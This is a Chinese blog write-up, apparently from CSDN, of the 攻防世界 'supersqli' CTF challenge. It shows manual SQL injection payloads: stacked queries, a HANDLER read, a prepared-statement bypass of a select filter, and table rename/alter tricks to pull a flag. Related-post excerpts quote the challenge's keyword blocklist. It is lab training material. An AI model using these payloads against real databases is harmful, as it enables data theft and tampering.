攻防世界-supersqli

已于 2023-03-28 19:57:01 修改
阅读量479 收藏 5
点赞数 2
文章标签: sql 数据库
于 2023-03-28 19:54:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63563528/article/details/129804240
版权

我的做题环境是Windows,题目描述随便注,打开容器:

 查看源代码,源代码是这样描述的:

提示说“sqlmap是没有灵魂的”,我们就不要用sqlmap了,这题是手注。我们分步骤进行:

一.确定有无SQL注入

 查询1,2,发现显示正常:

二.判断有几字段

 输入1' order by 1#  和 1' order by 2#

都回显正常,到1' order by 3#就不行了,报错,说明SQL语句的字段为2

三.进行爆表

     1.联合查询

-1' union select 1,databases #

这个地方报错了,因为select被过滤了,且无法通过大小写绕过,换用堆叠注入。

      2.堆叠注入

-1';show databases; #

查看数据库:

因为题目是“supersqli”,所以直接查看上面这个数据库。

-1';use supersqli;show tables;#

这里发现纯数字这个表很可疑,查看一下

 -1';use supersqli;show columns from `1919810931114514`;#

(这里包裹纯数字的符号为反引号,它是键盘上的esc键下方一个键)

找到flag了

找到flag位置后,有这么三种字段查询法查看flag:handler查询法,预编译绕过法,修改原查询法。

四.字段查询

      1.handler查询法

-1';use supersqli;handler `1919810931114514` open as p ;handler p read first;#

      2.预编译绕过法

select flag from `1919810931114514`

select是被过滤掉的,所以直接查是查不了的,所以用预编译来绕过select的过滤:

查询:

-1';

set @sql = CONCAT('sele','ct flag from `1919810931114514`;');

prepare stmt from @sql;

EXECUTE stmt;#

这个地方又被strstr过滤了prepare,但是这里不区分大小写,所以大小写绕过一下:

得到flag。

      3.修改原查询法

这也就是官方wp所使用的,贴上官方wp:

根据两个表的情况结合实际查询出结果的情况判断出words是默认查询的表,因为查询出的结果是一个数字加一个字符串,words表结构是id和data,传入的inject参数也就是赋值给了id

这道题没有禁用rename和alert,所以我们可以采用修改表结构的方法来得到flag
将words表名改为words1,再将数字名表改为words,这样数字名表就是默认查询的表了,但是它少了一个id列,可以将flag字段改为id,或者添加id字段

1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#

这段代码的意思是将words表名改为words1,1919810931114514表名改为words,将现在的words表中的flag列名改为id
然后用1' or 1=1 #得到flag 

7ig3r
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界】五 --- supersqli
qq_43168364的博客
12-23 396
题目 — supersqli 一、writeup 二、知识点
攻防世界nice-bgm杂项
11-20
攻防世界nice_bgm杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953246
攻防世界Training-Stegano-1
10-31
攻防世界Training-Stegano-1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127614642
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询框里过滤了,在url框里没有) 在使用union select时发现过滤关键字 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200313161718411.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpd
攻防世界supersqli(堆叠注入)
最新发布
2302_79800344的博客
04-09 709
进入题目环境,有输入框与注入参数,推测类型为SQL注入:测试--注入类型为数字型还是字符型,构造payload:?inject=1 or 1=2 并提交: 发现页面依然正常,说明注入类型为字符型,则继续检查闭合方式,首先尝试单引号闭合,构造payload: ?inject=1' --+证实了闭合方式为单引号,继续测试字段数目(order by / group by ),经测试,字段数目为2。接着开始注数据库名,表名等关键信息:首先尝试Union联合注入---构造payload: ?inject=1' uni
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界——supersqli
weixin_62281892的博客
09-18 1752
PHP preg_replace() 正则替换,与Javascript 正则替换不同,PHP preg_replace() 默认就是替换所有符号匹配条件的元素。到这里我们的表列名就已经修改完毕,此时还会输出修改完成的words列名,最后通过万能钥匙1' or '1'='1即可得到输出。由于注入框的查询是对列id的搜索,此时参考两个表的列名,需要将flag列名改为能够查找的id列(修改包括名称和数据类型)。上网冲浪了解了一波,好像是类似黑名单,这些词会被替换,那没办法了,我们就用堆叠注入。
攻防世界-web-supersqli
wuh2333的博客
06-07 896
我们看到,服务端默认的查询语句查询出两个字段,说明查询的是words表,我们将表1919810931114514的名字改成words并且将flag字段改为id字段不就行了吗?这里尝试按照基本思路进行验证,先确定注入点,然后通过union查询依次确认数据库名,表名,字段名,最终获取到我们想要的字段信息。博客里提到的一种预编译绕过的方式可以让我们绕过waf的限制使用select语句,处理起来较为复杂,这里就不详细说明了。使用 or 永真修改查询条件可以将所有信息查询出来,因此这里肯定是存在sql注入的。
WEB:supersqli(多解)
sleepywin的博客
07-16 799
背景知识 sql注入 堆叠注入 题目 输入款默认1,先输入1,页面正常显示 再输入1',显示报错 加上注释符号#或者--+或者%23(注释掉后面语句,使1后面的单引号与前面的单引号成功匹配就不会报错)页面回显正常,那么闭合符号就是单引号。 输入 1# 判断类型,查询1 and 1=1 和1 and 1=2,发现两次提交后页面一样,可以判断出为字符型注入漏洞; 使用万能注入语句 1' or 1=1# 回显不正常,存在注入
攻防世界靶场(web-supersqli)--堆叠注入、二次注入
DMXA的博客
09-21 220
这段代码是使用 PHP 语言编写的一个正则表达式,用于检测变量 $inject 中是否包含一些常见的 SQL 注入攻击关键字。具体来说,它通过 preg_match() 函数匹配字符串 $inject 中是否存在以下关键字(不区分大小写):select: 查询关键字。update: 更新关键字。delete: 删除关键字。drop: 删除表关键字。insert: 插入关键字。where: 查询条件关键字。.: 正则表达式中的特殊字符,可能被用于注入攻击。
攻防世界-Web高手进阶区-supersqli(强网杯的随便注)
feng的博客
09-14 1426
前言 此题可谓是奇技淫巧甚多,之前做过一次,不过当时没有写WP。今天偶然又看到了这个题目,打开环境发现又有些不会,因此又把这题相关的知识点和各种技巧看了一遍,写下这篇WP。 WP 首先进入环境,发现是SQL注入。我们先简单的进行一些测试,发现是字符型注入,因此加一个单引号然后后面加#来闭合,然后测试1=1,1=2,发现都可以,然后进行order by测试,发现是2。但是在进行union注入的时候出现: return preg_match("/select|update|delete|drop|insert|
XCTF-攻防世界CTF平台-Web类——14、supersqli(SQL注入、关键词过滤)
Onlyone_1314的博客
11-27 1932
目录标题方法一、堆叠注入1、rename修改表名和alter change修改列名2、rename修改表名和alter add添加列名方法二、handler语句方法三、预编译 打开题目地址 之后搜索:1’ or 1=1# 成功返回了3条数据,说明存在SQL注入漏洞 之后先判断有几列数据,使用order by 1让返回的数据按照第一列排序: 1' or 1=1 order by 1 # 返回了正确的结果,并且按照第一列排序了,说明至少存在一列数据。 其实我们也可以直接从order by 2让返回的数据
攻防世界】十四、supersqli
Hi~ 土拨鼠
09-08 146
步骤 先输入1'")提交之后发现报错: 根据报错信息我们可以发现是用单引号'来进行闭合的 接着使用1' --+发现被过滤: 然后使用注释1' #发现可以使用: 使用order by语句发现有两个字段,接下来再用联合查询1' and select 1,2 #发现被过滤了: 而且绕不过去,既然这样我们尝试一下报错注入: payload:1' and extractvalue(1,concat('^',database(),'^'))# 成功拿到库名,但是拿到之后也没有其他方法继续拿数据,这里我们...
sqlmap使用方法
tothemoon的博客
03-03 419
直接进入正题: 环境:python2.7 python2 sqlmap.py -u “这里插入url地址” --data=“这里是注入点的变量名=1” python2 sqlmap.py -u “这里插入url地址” --data=“这里是注入点的变量名=1” --dbs 爆数据库库名 python2 sqlmap.py -u “这里插入url地址” --data=“这里是注入点的变量名=1...
攻防世界supersqli
qq_45955869的博客
05-27 215
提示:攻防世界supersqli。
supersqli(SQL注入流程及常用SQL语句)
Welcome To Myon'Blog !
03-30 824
一、SQL注入知识学习 1、判断注入类型 (1)数字型注入判断 (2)字符型注入判断 2、猜解sql查询语句中的字段数(order by 的使用) 3、判断显示位爆数据库的名字 4、注释(--+的使用) 5、堆叠注入 6、handler语句及用法 二、基于上述知识对此题的分析与解答 1、注入点、注入类型 2、判断列数 3、利用or 1=1暴露表中数据 联合注入 (1)看数据库 (2)查表名 (3)查询表中的列 6、处理被过滤 7、handler、hackba的使用
攻防世界supersqli
金 帛的博客
03-08 7648
攻防世界WP
攻防世界-get_post
08-24
攻防世界中,"get_post" 是一个题目,要求学习如何使用GET和POST请求来传递参数。在这个题目中,首先让我们使用GET方式传递一个名为a,值为1的变量。我们只需要在URL窗口输入"/?a=1"并回车即可。接下来,又让我们...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值